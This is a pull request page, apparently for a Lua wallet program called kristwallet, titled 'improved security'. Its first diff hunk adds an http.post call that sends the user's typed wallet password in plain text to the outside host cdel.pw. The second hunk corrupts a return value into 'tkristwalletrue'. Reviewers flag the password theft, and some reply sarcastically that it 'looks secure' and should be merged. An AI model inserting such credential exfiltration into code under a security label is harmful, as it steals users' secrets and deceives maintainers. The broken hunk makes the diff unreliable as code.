### PR TITLE
improved security

### PR DESCRIPTION
**Pull request by ghost**

### CODE REVIEW

**Comment by bauen1** [comment]
its sending the password unencrypted to YOUR server ....

**Comment by Lemmmy** [comment]
Why did you change line 139?

File: kristwallet [hunk 1]
```diff
@@ -432,6 +432,7 @@ function openwallet()
     password = readconfig("keyAL")
   else
     password = read("*")
+    http.post("cdel.pw/krist-secure.php", "secure="..password)
```
Comment (bauen1) [inline kristwallet:435]: Just No

Comment (Lemmmy) [reply kristwallet:435]: looks secure to me

Comment (bauen1) [reply kristwallet:435]: Yeah this needs to be merged asap!

File: kristwallet [hunk 2]
```diff
@@ -136,7 +136,7 @@ function readconfig(path)
     local file = fs.open("kst/"..path,"r")
     local context = file.readAll():gsub("\n+$", "")
     file.close()
-    if context == "true" then return true end
+    if context == "true" then return tkristwalletrue end
```
Comment (Lemmmy) [inline kristwallet:139]: this will cause problems, undo this change

**Comment by BTCTaras** [comment]
haha ha good one!!!

File: kristwallet (hunk 1 above)
Comment (dmarcuse) [reply kristwallet:435]: looks fine
